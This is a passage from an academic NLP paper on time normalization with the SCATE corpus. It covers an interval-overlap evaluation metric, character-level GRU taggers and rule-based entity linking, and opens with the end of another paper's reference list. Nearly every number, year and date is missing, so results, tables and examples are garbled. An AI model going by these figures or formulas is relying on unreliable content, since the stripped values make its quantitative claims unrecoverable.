( ): – . yangfeng ji and noah smith. . neural dis- course structure for text categorization. in pro- ceedings of the acl conference. yoon kim, carl denton, luong hoang, and alexan- der m. rush. . structured attention networks. in proceedings of the iclr conference. terry koo, amir globerson, xavier carreras pérez, and michael collins. . structured prediction models via the matrix-tree theorem. in proceed- ings of the emnlp conference. pages – . alan lee, rashmi prasad, aravind joshi, nikhil di- nesh, and bonnie webber. . complexity of dependencies in discourse: are dependencies in discourse more complex than in syntax. in pro- ceedings of the international workshop on tree- banks and linguistic theories. page . sujian li, liang wang, ziqiang cao, and wenjie li. . text-level discourse dependency parsing. in proceedings of the acl conference. pages – . ziheng lin, hwee tou ng, and min-yen kan. . automatically evaluating text coherence using discourse relations. in proceedings of the acl conference. pages – . tal linzen, emmanuel dupoux, and yoav gold- berg. . assessing the ability of lstms to learn syntax-sensitive dependencies. transac- tions of the association for computational lin- guistics : – . yang liu and mirella lapata. . learning con- textually informed representations for linear-time discourse parsing. in proceedings of the emnlp conference. pages – . william c. mann and sandra a. thompson. . rhetorical structure theory: toward a functional theory of text organization. text-interdisciplinary journal for the study of discourse ( ): – . christopher d. manning, mihai surdeanu, john bauer, jenny rose finkel, steven bethard, and david mcclosky. . the stanford corenlp natural language processing toolkit. in pro- ceedings of the acl conference (system demon- strations). pages – . ryan mcdonald and giorgio satta. . on the complexity of non-projective data-driven depen- dency parsing. in proceedings of the th interna- tional conference on parsing technologies. pages – . igor a. melc̆uk. . dependency syntax: theory and practice. state university of new york press. mohsen mesgar and michael strube. . graph- based coherence modeling for assessing readabil- ity. in proceedings of the th joint conference on lexical and computational semantics. pages – . thomas meyer and bonnie webber. . im- plicitation of discourse connectives in (machine) translation. in proceedings of the workshop on discourse in machine translation. pages – . tomas mikolov, ilya sutskever, kai chen, greg s. corrado, and jeff dean. . distributed rep- resentations of words and phrases and their com- positionality. in proceedings of the nips confer- ence. pages – . alexander miller, adam fisch, jesse dodge, amir- hossein karimi, antoine bordes, and jason we- ston. . key-value memory networks for di- rectly reading documents. in proceedings of the emnlp conference. pages – . ankur parikh, oscar täckström, dipanjan das, and jakob uszkoreit. . a decomposable atten- tion model for natural language inference. in pro- ceedings of the emnlp conference. pages – . jeffrey pennington, richard socher, and christo- pher d. manning. . glove: global vectors for word representation. in proceedings of the emnlp conference. pages – . rashmi prasad, nikhil dinesh, alan lee, eleni miltsakaki, livio robaldo, aravind k. joshi, and bonnie l. webber. . the penn discourse treebank . . in lrec. tim rocktäschel, edward grefenstette, karl moritz hermann, tomáš kočiskỳ, and phil blunsom. . reasoning about entailment with neural at- tention. in proceedings of the iclr conference. duyu tang, bing qin, and ting liu. a. doc- ument modeling with gated recurrent neural net- work for sentiment classification. in proceedings of the emnlp conference. pages – . duyu tang, bing qin, and ting liu. b. learn- ing semantic representations of users and prod- ucts for document level sentiment classification. in proceedings of the acl conference. pages – . louis tesniére. . éléments de syntaxe struc- turale. editions klincksieck. matt thomas, bo pang, and lillian lee. . get out the vote: determining support or opposition from congressional floor-debate transcripts. in proceedings of the emnlp conference. pages – . william thomas tutte. . graph theory. suzan verberne, lou boves, nelleke oostdijk, and peter-arno coppen. . discourse-based answering of why-questions. traitement au- tomatique des language, discours et document: traitements automatics ( ): – . shuohang wang and jing jiang. . learning nat- ural language inference with lstm. in proceed- ings of naacl conference. pages – . florian wolf and edward gibson. . coherence in natural language: data structures and appli- cations. the mit press. pengtao xie and eric p. xing. . integrating doc- ument clustering and topic modeling. in proceed- ings of the conference on uncertainty in artificial intelligence. pages – . kelvin xu, jimmy ba, ryan kiros, kyunghyun cho, aaron courville, ruslan salakhudinov, rich zemel, and yoshua bengio. . show, attend and tell: neural image caption generation with visual attention. in international conference on machine learning. pages – . zichao yang, diyi yang, chris dyer, xiaodong he, alex smola, and eduard hovy. . hierar- chical attention networks for document classifica- tion. in proceedings of the naacl conference. pages – . dani yogatama and noah a. smith. . linguis- tic structured sparsity in text categorization. in proceedings of the acl conference. pages – . from characters to time intervals: new paradigms for evaluation and neural parsing of time normalizations egoitz laparra∗ dongfang xu∗ steven bethard school of information university of arizona tucson, az {laparra,dongfangxu ,bethard}@email.arizona.edu abstract this paper presents the first model for time normalization trained on the scate corpus. in the scate schema, time expressions are annotated as a semantic composition of time entities. this novel schema favors machine learning approaches, as it can be viewed as a semantic parsing task. in this work, we propose a character level multi-output neural network that outperforms previous state-of-the-art built on the timeml schema. to compare predic- tions of systems that follow both scate and timeml, we present a new scoring metric for time intervals. we also apply this new metric to carry out a comparative analysis of the anno- tations of both schemes in the same corpus. introduction time normalization is the task of translating natural language expressions of time to computer-readable forms. for example, the expression three days ago could be normalized to the formal representation - - in the iso- standard. as time nor- malization allows entities and events to be placed along a timeline, it is a crucial step for many informa- tion extraction tasks. since the first shared tasks on time normalization (verhagen et al., ), interest in the problem and the variety of applications have been growing. for example, lin et al. ( ) use normal- ized timestamps from electronic medical records to contribute to patient monitoring and detect potential causes of disease. vossen et al. ( ) identify multi- lingual occurrences of the same events in the news ∗these two authors contributed equally. by, among other steps, normalizing time-expressions in different languages with the same iso standard. fischer and strötgen ( ) extract and normalize time-expressions from a large corpus of german fic- tion as the starting point of a deep study on trends and patterns of the use of dates in literature. a key consideration for time normalization sys- tems is what formal representation the time expres- sions should be normalized to. the most popular scheme for annotating normalized time expressions is iso-timeml (pustejovsky et al., a; puste- jovsky et al., ), but it is unable to represent several important types of time expressions (e.g., a bounded set of intervals, like saturdays since march ) and it is not easily amenable to machine learning (the rule-based heideltime (strötgen et al., ) still yields state-of-the-art performance). bethard and parker ( ) proposed an alternate scheme, se- mantically compositional annotation of time ex- pressions (scate), in which times are annotated as compositional time entities (figure ), and suggested that this should be more amenable to machine learn- ing. however, while they constructed an annotated corpus, they did not train any automatic models on it. we present the first machine-learning models trained on the scate corpus of time normalizations. we make several contributions in the process: • we introduce a new evaluation metric for time normalization that can compare normalized times from different annotation schemes by mea- suring overlap of intervals on the timeline. • we use the new metric to compare scate and timeml annotations on the same corpus, and confirm that scate covers a wider variety of transactions of the association for computational linguistics, vol. , pp. – , . action editor: mona diab. submission batch: / ; revision batch: / ; published / . c© association for computational linguistics. distributed under a cc-by . license. this interval repeating-intervals day-of-week type=saturday saturdays between start-interval end-interval=doc-time since last interval=doc-time repeating-interval month-of-year type=march sub-interval march day-of-month value= figure : annotation of the expression saturdays since march following the scate schema. time expressions. • we develop a recurrent neural network for learn- ing scate-style time normalization, and show that our model outperforms the state-of-the-art heideltime (strötgen et al., ). • we show that our character-based multi-output neural network architecture outperforms both word-based and single-output models. background iso-timeml (pustejovsky et al., a; pustejovsky et al., ) is the most popular scheme for annotat- ing time expressions. it annotates time expressions as phrases, and assigns an iso normalization (e.g., - - t : or pt h) as the value at- tribute of the normalized form. iso-timeml is used in several corpora, including the timebank (puste- jovsky et al., b), wikiwars (mazur and dale, ), timen (llorens et al., ), and the temp- eval shared tasks (verhagen et al., ; verhagen et al., ; uzzaman et al., ). however, the iso-timeml schema has a few drawbacks. first, times that align to more than a single calendar unit (day, week, month, etc.), such as saturdays since march (where multiple satur- days are involved), cannot be described in the iso format since they do not correspond to any pre- fix of yyyy-mm-ddthh:mm:ss. second, each time expression receives a single value, regardless of the word span, the compositional semantics of the expression are not represented. for example, in the expressions since last week and since march , the semantics of since are identical – find the inter- val between the anchor time (last week or march ) and now. but iso-timeml would have to annotate these two phrases independently, with no way to in- dicate the shared portion of their semantics. these drawbacks of iso-timeml, especially the lack of compositionality, make the development of machine learning models difficult. thus, most prior work has taken a rule-based approach, looking up each token of a time expression in a normalization lexicon and then mapping this sequence of lexical entries to the normalized form (strötgen and gertz, ; bethard, ; lee et al., ; strötgen and gertz, ). as an alternative to timeml, and inspired by pre- vious works, schilder ( ) and han and lavie ( ), bethard and parker ( ) proposed seman- tically compositional annotation of time expres- sions (scate). in the scate schema, each time expression is annotated in terms of compositional time entity over intervals on the timeline. an ex- ample is shown in figure , with every annotation corresponding to a formally defined time entity. for instance, the annotation on top of since corresponds to a between operator that identifies an interval starting at the most recent march and ending at the document creation time (dct). the between operator is formally defined as: between([t , t ): interval, [t , t ): interval): interval = [t , t ). the scate schema can represent a wide variety of time expressions, and provides a formal definition of the semantics of each annotation. unlike timeml, scate uses a graph structure to capture composi- tional semantics and can represent time expressions that are not expressed with contiguous phrases. the schema also has the advantage that it can be viewed as a semantic parsing task and, consequently, is more suitable for machine-learning approaches. however, bethard and parker ( ) present only a corpus; they do not present any models for semantic parsing. an interval-based evaluation metric for normalized times before attempting to construct machine-learned mod- els from the scate corpus, we were interested in evaluating bethard and parker ( )’s claim that the scate schema is able to represent a wider vari- ety of time expressions than timeml. to do so, we propose a new evaluation metric to compare time nor- malizations annotated in both the iso format of timeml and the time entity format of scate. this new evaluation interprets normalized annotations as intervals along the timeline and measures the overlap of the intervals. timeml timex (time expression) annotations are converted to intervals following iso se- mantics of their value attribute. so, for example, - - is converted to the interval [ - - t : : , - - t : : ), that is, the - hour period starting at the first second of the day on - - and ending just before the first second of the day on - - . scate annotations are con- verted to intervals following the formal semantics of each entity, using the library provided by bethard and parker ( ). so, for example, next(year( ), simpleperiod(years, )), the years following , is converted to [ - - t : , - - t : ). note that there may be more than one interval associated with a single annotation, as in the saturdays since march example. once all anno- tations have been converted into intervals along the timeline, we can measure how much the intervals of different annotations overlap. given two sets of intervals, we define the interval precision, pint, as the total length of the intervals in common between the two sets, divided by the total length of the intervals in the first set. interval recall, rint is defined as the total length of the intervals in common between the two sets, divided by the total length of the intervals in the second set. formally: is ⋂ ih = {i∩ j : i ∈ is ∧ j ∈ ih} pint(is, ih) = ∑ i∈compact(is ⋂ ih) |i| ∑ i∈is |i| rint(is, ih) = ∑ i∈compact(is ⋂ ih) |i| ∑ i∈∪ih |i| where is and ih are sets of intervals, i∩j is possibly the empty interval in common between the intervals i and j, |i| is the length of the interval i, and compact takes a set of intervals and merges any overlapping intervals. given two sets of annotations (e.g., one each from two time normalization systems), we define the over- all precision, p , as the average of interval precisions where each annotation from the first set is paired with all annotations that textually overlap it in the second set. overall recall is defined as the average of interval recalls where each annotation from the second set is paired with all annotations that textually overlap it in the first set. formally: oia(b) = ⋃ b∈b:overlaps(a,b) intervals(b) p(s, h) = |s| ∑ s∈s pint(intervals(s), ois(h)) r(s, h) = |h| ∑ h∈h rint(intervals(h), oih(s)) where s and h are sets of annotations, intervals(x) gives the time intervals associ- ated with the annotation x, and overlaps(a, b) decide whether the annotations a and b share at least one character of text in common. it is important to note that these metrics can be applied only to time expressions that yield bounded intervals. time expressions that refer to intervals with undefined boundaries are out of the scope, like in “it takes just a minute” or “i work every saturday”. data analysis . timeml vs. scate both timeml and scate annotations are available on a subset of the tempeval corpus (uzzaman et al., ) that contains a collection of news articles from different sources, such as wall street journal, aquaint timebank test documents sentences timeml timex scate entities scate time exp. scate bounded table : number of documents, timeml timex an- notations and scate annotations for the subset of the tempeval corpus annotated with both schemas. aquaint timebank p r f p r f body text . . . . . . all text . . . . . . table : comparison of timeml and scate annotations. new york times, cable news network, and voices of america. table shows the statistics of the data. documents from the aquaint and timebank form the training and development dataset. the scate corpus contains time entities (individual com- ponents of a time expression, such as every, month, last, monday, etc.) annotated in the train+dev set (i.e. aquaint+timebank). these entities compose a total of time expressions (every month, last monday, etc.) of which yield bounded intervals, i.e. intervals with a specified start and ending (last monday is bounded, while every month is not). we apply the interval-based evaluation metric in- troduced in section to the aquaint and time- bank datasets, treating the timeml annotations as the system (s) annotator and the scate annotations as the human (h) annotator. table shows that the scate annotations cover different time intervals than the timeml annotations. in the first row, we see that timeml has a recall of only % of the time in- tervals identified by scate in the aquaint corpus and of only % in the timebank corpus. we manu- ally analyzed all places where timeml and scate annotations differed and found that the scate inter- pretation was always the correct one. for example, a common case where timeml and scate annotations overlap, but are not identical, is time expressions preceded by a preposition like “since”. the timeml annotation for “since ” (with a dct of - - t : ) only covers the year, “ ”, resulting in the time interval [ - - t : , - - t : ). the scate an- notation represents the full expression and, conse- quently, produces the correct time interval [ - - t : , - - t : ). another common case of disagreement is where timeml failed to compose all pieces of a complex expression. the timeml annotation for “ : a.m. ( gmt) friday” annotates two separate inter- vals, the time and the day (and ignores “ gmt” entirely). the scate annotation recognizes this as a description of a single time interval, [ - - t : , - - t : ). timeml and scate annotations also differ in how references to particular past periods are inter- preted. for example, timeml assumes that “last year” and “a year ago” have identical semantics, re- ferring to the most recent calendar year, e.g., if the dct is - - , then they both refer to the inter- val [ - - t : , - - t : ). scate has the same semantics for “last year”, but recog- nizes that “a year ago” has different semantics: a period centered at one year prior to the dct. under scate, “a year ago” refers to the interval [ - - t : , - - t : ). beyond these differences in interpretation, we also observed that, while the scate corpus annotates time expressions anywhere in the document (includ- ing in metadata), the timebank timex annotations are restricted to the main text of the documents. the second row of table shows the evaluation when comparing overall text in the document, not just the body text. unsurprisingly, timeml has a lower re- call of the time intervals from the scate annotations under this evaluation. . types of scate annotations studying the training and development portion of the dataset, we noticed that the scate annotations can be usefully divided into three categories: non- operators, explicit operators, and implicit operators. we define non-operators as numbers, periods (e.g., three months), explicit intervals (e.g., years like ), and repeating intervals (day-of-weeks like friday, month-of-years like january, etc.). non-operators are basically atomic; they can be in- non-op exp-op imp-op total % % % % table : distribution of time entity annotations in aquaint+timebank. terpreted without having to refer to other annotations. operators are not atomic; they can only be interpreted with respect to other annotations they link to. for example, the this operator in figure can only be interpreted by first interpreting the day-of-week non-operator and the between operator that it links to. we split operators into two types: explicit and implicit. we define an operator as explicit if it does not overlap with any other annotation. this occurs, for example, when the time connective since evokes the between operator in figure . an operator is considered to be implicit if it overlaps with an- other annotation. this occurs, for example, with the last operator in figure , where march implies last march, but there is no explicit signal in the text, and it must be inferred from context. we study how these annotation groups distribute in the aquaint and timebank documents. table shows that non-operators are much more frequent than operators (both explicit and implicit). models we decompose the normalization of time expressions into two subtasks: a) time entity identification which detects the spans of characters that belong to each time expression and labels them with their corre- sponding time entity; and b) time entity composition that links relevant entities together while respecting the entity type constraints imposed by the scate schema. these two tasks are run sequentially using the output of the former as input to the latter. once identification and composition steps are completed we can use the final product, i.e. semantic composi- tional of time entities, to feed the scate interpreter and encode time intervals. . time entity identification time entity identification is a type of sequence tag- ging task where each piece of a time expression is https://github.com/clulab/timenorm assigned a label that identifies the time entity that it evokes. we express such labels using the bio tagging system, where b stands for the beginning of an annotation, i for the inside, and o for outside any annotation. differing somewhat from standard sequence tagging tasks, the scate schema allows multiple annotations over the same span of text (e.g., “saturdays” in figure is both a day-of-week and a this), so entity identification models must be able to handle such multi-label classification. . . neural architectures recurrent neural networks (rnn) are the state- of-the-art on sequence tagging tasks (lample et al., a; graves et al., ; plank et al., ) thanks to their ability to maintain a memory of the sequence as they read it and make predictions conditioned on long distance features, so we also adopt them here. we introduce three rnn architectures that share a similar internal structure, but differ in how they repre- sent the output. they convert the input into features that feed an embedding layer. the embedded feature vectors are then fed into two stacked bidirectional gated recurrent units (grus), and the second gru followed by an activation function, outputs one bio tag for each input. we select gru for our models as they can outperform another popular recurrent unit lstm (long short term memory), in terms of pa- rameter updates and convergence in cpu time with the same number of parameters (chung et al., ). our -sigmoid model (figure ) approaches the task as a multi-label classification problem, with a set of sigmoids for each output that allow zero or more bio labels to be predicted simultaneously. this is the standard way of encoding multi-label classification problems for neural networks, but in our experiments, we found that these models perform poorly since they can overproduce labels for each input, e.g., could be labeled with both day-of-month and month- of-year at the same time. our -softmax model (figure ) splits the out- put space of labels into two sets: non-operators and operators (as defined in section . ). it is very un- likely that any piece of text will be annotated with more than one non-operator or with more than one operator, though it is common for text to be anno- in the training data, only of non-operators overlap with another non-operator, and only of operators overlap input feature embed bi-gru bi-gru sigmoid output non-operators and operators m m lu nnp b-last b-month a a ll nnp i-last i-month y y ll nnp i-last i-month zs ∅ ∅ nd cd b-day nd cd i-day . . . . . . . . . . . . . . . . . . figure : architecture of the -sigmoid model. the input is may . in scate-style annotation, may is a month- of-year (a non-operator), with an implicit last (an operator) over the same span, and is a day-of-month. at the feature layer, m is an uppercase letter (lu), a and y are lowercase letters (ll), space is a separator (zs), and may is a proper noun (nnp). input feature embed bi-gru bi-gru softmax output non-operators operators m m lu nnp b-month b-last a a ll nnp i-month i-last y y ll nnp i-month i-last zs ∅ o o . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . figure : architecture of the -softmax model. the input is may. the scate annotations and features are the same as in figure . tated with one non-operator and one operator (see figure ). as a result, we can use two softmaxes, one for non-operators and one for operators, and the - softmax model thus can produce , , or labels per input. we share input and embedding layers, but as- sociate a separate set of stacked bi-grus with each output category, as shown in figure . our -softmax further splits operators into explicit operators and implicit operators (again, as defined with another operator. for example, a nyt said in an editorial on saturday, april , saturday is labeled as [day-of-week, last, intersection] where the last two labels are operators. in preliminary experiments, we tried sharing gru layers as well, but this generally resulted in worse performance. in section . ). we expect this to help the model since the learning task is very different for these two cases: with explicit operators, the model just has to memorize which phrases evoke which operators, while with implicit operators, the model has to learn to infer an operator from context (verb tense, etc.). we use three softmaxes, one each for non-operators, explicit operators, and implicit operators, and, as with -softmax, we share input and embedding layers, but associate a separate set of stacked bi-grus with each output category. the model looks similar to figure , but with three output groups instead of two. we feed three features as input to the rnns: text: the input word itself for the word-by-word model, or a the single input character for the character-by-character model. unicode character categories: the category of each character as defined by the unicode standard. this encodes information like the presence of upper- case (lu) or lowercase (ll) letters, punctuation (po), digits (nd), etc. for the word-by-word model, we concatenate the character categories of all characters in the word (e.g., may becomes lullll). part-of-speech: the part-of-speech as determined by the stanford pos tagger (toutanova et al., ). we expect this to be useful for, e.g., finding verb tense to help distinguish between implicit last and next operators. for the character-by-character model, we repeat the word-level part-of-speech tag for each char- acter in the word, and characters with no part-of- speech (e.g., spaces) get no tag. . . input: words vs. characters identifying scate-style time entity is a sequence tagging task, similar to named entity recognition (ner), so we take inspiration from recent work in neural architectures for ner. the first neural ner models followed the prior (non-neural) work in ap- proaching ner as a word classification problem, ap- plying architectures such as sliding-window feedfor- ward neural networks (qi et al., ), convolutional neural networks (cnns) with conditional random field (crf) layers (collobert et al., ), and lstm with crf layers and hand-crafted features (huang et al., ). more recently, character-level neural net- works have also been proposed for ner, including several which combine a cnn or lstm for learn- ing character-based representations of words with an lstm or lstm-crf for word-by-word labeling (chiu and nichols, ; lample et al., b; ma and hovy, ), as well as character-by-character sequence-to-sequence networks (gillick et al., ; kuru et al., ). based on these works, we consider two forms of input processing for our rnns: word-by-word vs. character-by-character. several aspects of the time normalization problem make the character-based ap- proach especially appealing. first, many time phrases involve numbers that must be interpreted semanti- cally (e.g., a good model should learn that months see http://unicode.org/notes/tn / cannot be a number higher than ), and digit-by- digit processing of numbers allows such interpreta- tions, while treating each number as a word would result in a sparse, intractable learning problem. sec- ond, word-based models assume that we know how to tokenize the text into words, but at times present challenging formats such as overnight, where over evokes a last operator and night is a part-of-day. finally, character-based models can ameliorate out- of-vocabulary (oov) words, which are a common problem when training sparse datasets. (hybrid word- character models, such as the lstm-cnns-crf (ma and hovy, ) can address this last problem, but not the previous two.) for our word-based model, we apply the nltk tokenizer (bird et al., ) to each sentence. we further tokenize with the regular expres- sion "\d+|[ˆ\d\w]+|\s" to break apart alpha- numeric expressions like edt. however, the tokenizer is unable to break-apart expressions such as and overnight. for our character-based model, no tokenization is applied and every character (including whitespace characters) is fed as input. . time entity composition once the entities of the time-expressions are identi- fied, they must be composed in order to obtain their semantic interpretation. this step of the analysis con- sists of two parts: linking the entities that make up a time-expression together and completing the entities’ properties with the proper values. for both cases, we set a simple set of rules that follow the constraints imposed by the scate schema . . . time entity linking algorithm shows the process followed to obtain the links between the time entities. first, we define an empty stack that will store the entities belong- ing to the same time expression. then, we iterate over the list of entities of a document sorted by their starting character offsets (sortbystart). for each of these entities (entity ) and for each entity in the stack (entity ), we check if the guidelines specify a possible link (linkisvalid) between the types of entity and entity . if such a link is possible, and https://github.com/bethard/ anafora-annotations/blob/master/.schema/ timenorm-schema.xml algorithm linking time entities stack = ∅ for entity in sortbystart(entities) do if start(entity ) - end(stack) > then stack = ∅ end if for entity in stack do if linkisvalid(entity , entity ) then createlink(entity , entity ) end if end for push(stack, entity ) end for it has not already been filled by another annotation, we greedily make the link (createlink). when the distance in the number of characters between the entity and the end of the stack is bigger than , we assume that the entities do not belong to the time expression. thus, we empty the stack. for example, our time entity identification model gets the year, month-of-year and day-of- month for the time-expression - - . our time entity composition algorithm then iterates over these entities. at the beginning the stack is empty, it just pushes the entity (year) into the stack. for the entity (month-of-year) it checks if the guidelines define a possible link between this en- tity type and the one currently in the stack (year). in this case, the guidelines establish that a year can have a sub-interval link to a season-of- year, a month-of-year or week-of-year. thus, the algorithm creates a sub-interval link between and . the entity is then pushed into the stack. this process is repeated for the en- tity (day-of-month) checking if there was a possible link to the entities in the stack ( , ). the guidelines define a possible sub-interval link between month-of-year and day-of-month, so a link is created here as well. now, suppose that the following time entity in the list is several words ahead of so the character distance between both entities is larger than . if that is the case the stack is empty and the process starts again to compose a new time expression. the distance threshold was selected based on the perfor- mance on the development dataset. . . property completion the last step is to associate each time entity of a time-expression with a set of properties that include information needed for its interpretation. our system decides the value of these properties as follows: type: the scate schema defines that some enti- ties can only have specific values. for example, a season-of-year can only be spring, summer, fall or winter, a month-of-year can only be january, february, march, etc. to complete this property we take the text span of the time en- tity and normalize it to the values accepted in the schema. for example, if the span of a month-of- year entity was the numeric value we would normalize it to january, if its span was sep. we would normalize it to september, and so on. value: this property contains the value of a nu- merical entity, like day-of-month or hour-of- day.to complete it, we just take the text span of the entity and convert it to an integer. if it is written in words instead of digits (e.g., nineteen instead of ), we apply a simple grammar to convert to an integer. semantics: in news-style texts, it is common that expressions like last friday, when the dct is a fri- day, refer to the day as the dct instead of the previ- ous occurrence (as it would in more standard usage of last). scate indicates this with the semantics property, where the value interval-included in- dicates that the current interval is included when calculating the last or next occurrence. for the rest of the cases the value interval-not-included is used. in our system, when a last operator is found, if it is linked to a day-of-week (e.g. friday) that matches the dct, we set the value of this property to interval-included. interval-type: operators like next or last need an interval as reference in order to be interpreted. normally, this reference is the dct. for example, next week refers to the week following the dct, and in such a case the value of the property interval- type for the operator next would be doctime. however, sometimes the operator is linked to an in- terval that serves as reference by itself, for example, “by the year ”. in this cases the value of the interval-type is link. our system sets the value https://github.com/ghewgill/text num of this property to link if the operator is linked to a year and doctime otherwise. this is a very coarse heuristic; finding the proper anchor for a time expression is a challenging open problem for which future research is needed. . automatically generated training data every document in the dataset starts with a document creation time. these time expressions are quite partic- ular; they occur in isolation and not within the context of a sentence and they always yield a bounded inter- val. thus their identification is a critical factor in an interval based evaluation metric. however, document times appear in many different formats: ”monday, july- , ”, ” / / : am”, ” - - pm”, etc. many of these formats are not cov- ered in the training data, which is drawn from a small number of news sources, each of which uses only a single format. we therefore designed a time gen- erator to randomly generate an extra isolated training examples for a wide variety of such expres- sion formats. the generator covers different for- mats which include variants covering abbreviation, with/without delimiters, mixture of digits and strings, and different sequences of time units. experiments we train and evaluate our models on the scate cor- pus described in section . as a development dataset, documents are taken as a random stratified sample from the tempeval (timebank + aquaint) portion shown in table , including broadcast news documents ( abc, cnn, pri, voa), and newswire documents ( ap, nyt, wsj). we use the interval-based evaluation metric described in sec- tion , but also report more traditional information extraction metrics (precision, recall, and f ) for the time entity identification and composition steps. let s be the set of items predicted by the system and h is the set of items produced by the humans, precision (p ), recall (r), and f are defined as: p(s, h) = |s ∩h| |s| r(s, h) = |s ∩h| |h| we use the common formats available in office suites, specif- ically, libreoffice. f (s, h) = ·p(s, h) ·r(s, h) p(s, h) + r(s, h) . for these calculations, each item is an annotation, and one annotation is considered equal to another if it has the same character span (offsets), type, and properties (with the definition applying recursively for properties that point to other annotations). to make the experiments with different neural ar- chitectures comparable, we tuned the parameters of all models to achieve the best performance on the development data. due to space constraints, we only list here the hyper-parameters for our best char - softmax: the embedding size of the character-level text, word-level text, pos tag, and unicode character category features are , , and , respec- tively. to avoid overfitting, we used dropout with probabilities . , . and . for the features, respectively; the sizes of the first and second layer gru units are set as and . we trained the model with rmsprop optimization on mini-batches of size , and followed standard recommendations to leave the optimizer hyperparameter settings at their default values. each model is trained for at most epochs, the longest training time for char -softmax model is around hours using x nvidia kepler k x gpu. . model selection we compare the different time entity identification models described in section . , training them on the training data, and evaluating them on the develop- ment data. among the epochs of each model, we se- lect the epoch based on the output(s) which the model is good at predicting because based on its weakness, the model would yield unstable results in our pre- liminary experiments. for example, for -softmax models, our selections rely on the performances of non-operators and implicit-operators. table shows the results of the development phase. first, we find that the character-based models out- perform the word-based models. for example, the best character-based model achieves the f of . (char -softmax),which is significantly better than the best word-based model achieving the f of only we briefly explored using pre-trained word embeddings to try to improve the performance of the word -sigmoid model, but it yielded a performance that was still worse than the character-based model, so we didn’t explore it further. model p r f word -sigmoid . . . char -sigmoid . . . word -softmax . . . char -softmax . . . word -softmax . . . char -softmax . . . char -softmax extra . . . table : precision (p ), recall (r), and f for the different neural network architectures on time entity identification on the development data. . (p= ). second, we find that softmax mod- els outperform sigmoid models. for example, the char -softmax model achives the f of . , sig- nificantly better than . f of the char -sigmoid model (p= ). third, for both character- and word- based models, we find that -softmax significantly outperforms -softmax: the char -softmax f of . is better than the char -softmax f of . (p= ) and the word -softmax f of . is bet- ter than the word -softmax f of . (p= . ). additionally, we find that all models are better at identifying non-operators than operators and that the explicit operators are the hardest to solve. for ex- ample, the char -softmax model gets . f for non-operators, . f for explicit operators and . f for implicit operators. finally, we also train the best model, char -softmax, using the generated an- notations described in section . and achieve . f (char -softmax extra), i.e., the model performs better without the extra data (p= ). this is probably a result of overfitting due to the small variety of time formats in the training and development data. from this analysis on the development set, we se- lect two variants of the char -softmax architecture for evaluation on the test set: char -softmax and char -softmax extra. these models were then cou- pled with the rule-based linking system described in section . to produce a complete scate-style parsing system. . model evaluation we evaluate both char -softmax and char - softmax extra on the test set for identification and we used a paired bootstrap resampling significance test. char -softmax char -soft. extra p r f p r f non-op . . . . . . exp-op . . . . . . imp-op . . . . . . ident . . . . . . comp . . . . . . table : results on the test set for time entity identifi- cation (ident) and time entity composition (comp) steps. for the former we report the performances for each entity set: non-operators (non-op), explicit operators (exp-op) and implicit operators (imp-op). model p r f heideltime . . . char -softmax . . . char -softmax extra . . . table : precision (p ), recall (r), and f of our models on the test data producing bounded time intervals. for comparison, we include the results obtained by heidel- time. composition tasks. table shows the results. on the identification task, char -softmax extra is no worse than using the original dataset with the over- all f . vs. . (p= . ), and using extra generated data the model is better at predicting non- operators and implicit operators with higher preci- sions (p= . ), which is the key to produce correct bounded time intervals. to compare our approach with the state-of-the-art, we run heideltime on the test documents and make use of the metric described in section . this way, we can compare the intervals produced by both sys- tems no matter the annotation schema. table shows that our model with additional randomly generated training data outperforms heideltime in terms of precision, with a significant difference of . per- centage points (p= . ), while heideltime obtains a non-significant better performance in terms of re- call (p= . ). overall, our model gets . more percentage points than heideltime in terms of f (p= . ). notice that, although the model trained without extra annotations is better in time entity com- position (see table ), it performs much worse at producing final intervals. this is caused by the fact model p r f heideltime . . . char -softmax . . . char -softmax extra . . . table : precision (p ), recall (r), and f on bounded intervals on the timeml/scate perfect overlapping test data. that this model fails to identify the non-operators that compound dates in unseen formats (see section . ). however, evaluating heideltime in the scate annotations may not be totally fair. heideltime was developed following the timeml schema and, as we show in section , scate covers a wider set of time expressions. for this reason, we perform an additional evaluation. first, we compare the annota- tions in the test set using our interval-based metric, similar to the comparison reported in table , and select those cases where timeml and scate match perfectly. then, we remove the rest of the cases from the test set. consequently, we also remove the pre- dictions given by the systems, both ours and heidel- time, for those instances. finally, we run the interval scorer using the new configuration. as can be seen in table all the models improve their performances. however, our model still performs better when it is trained with the extra annotations. the scate interpreter that encodes the time in- tervals needs the compositional graph of a time- expression to have all its elements correct. thus, failing in the identification of any entity of a time- expression results in totally uninterpretable graphs. for example, in the expression next year, if our model identifies year as a period instead of an inter- val it cannot be linked to next because it violates the scate schema. the model can also fail in the recognition of some time-entities, like summer in the expression last summer. this identification errors are caused mainly by the sparse training data. as graphs containing these errors produce unsolvable logical formulae, the interpreter cannot produce intervals and hence the recall decreases. within those inter- vals that are ultimately generated, the most common mistake is to confuse the last and next operators, and as a result an incorrectly placed interval even with correctly identified non-operators. for example, if an october with an implicit next operator is in- stead given a last operator, instead of referring to [ - - t : , - - t : ), it will refer to [ - - t : , - - t : ). missing implicit operators is also the main source of errors for heideltime, which fails with complex compositional graphs. for example, that january day in is annotated by heideltime as two different intervals, corresponding respectively to january and . as a consequence, heideltime predicts not one but two incorrect intervals, affecting its precision. discussion as for the time entity identification task, the per- formance differences between development and test dataset could be attributed to the annotation distri- butions of the datasets. for example, there are season-of-year annotations in the test set while there are no such annotations in the development dataset; the relative frequencies of the annotations minute- of-hour, hour-of-day, two-digit-year and time- zone in the test set are much lower, and our models are good at predicting such annotations. explicit operators are very lexically-dependent, e.g. last corresponds to one word from the set {last, latest, previously, recently, past, over, recent, earlier, the past, before}, and the majority of them appear once or twice in the training and development sets. our experiments verify the advantages of character-based-models in predicting scate anno- tations, which are in agreement with our explana- tions in section . . : word-based-models tend to fail to distinguish numbers from digit-based time ex- pressions. it’s difficult for word-based-models to catch some patterns of time expressions, such as th and th, august and aug., etc., while character- based models are robust to such variance. we ran an experiment to see whether these benefits were unique to compositional annotations like those of scate, or more generally to simply recognizing time expressions. we used the timeml annotations from aquaint and timebank (see table ) to train two multi-class classifiers to identify timex an- notations. the models were similar to our char - softmax and word -softmax models, using the same parameter settings, but with a single softmax output layer to predict the four types of timex : date, time, duration, and set. as shown in table , timex timex -digits p r f p r f char . . . . . . word . . . . . . table : precision (p ), recall (r), and f for character- based and word-based models in predicting timeml timex annotations on the tempeval test set. timex -digits is the subset of annotations that contain digits. on the test set the word-based model significantly out- performs the character-based model in terms of both time expressions 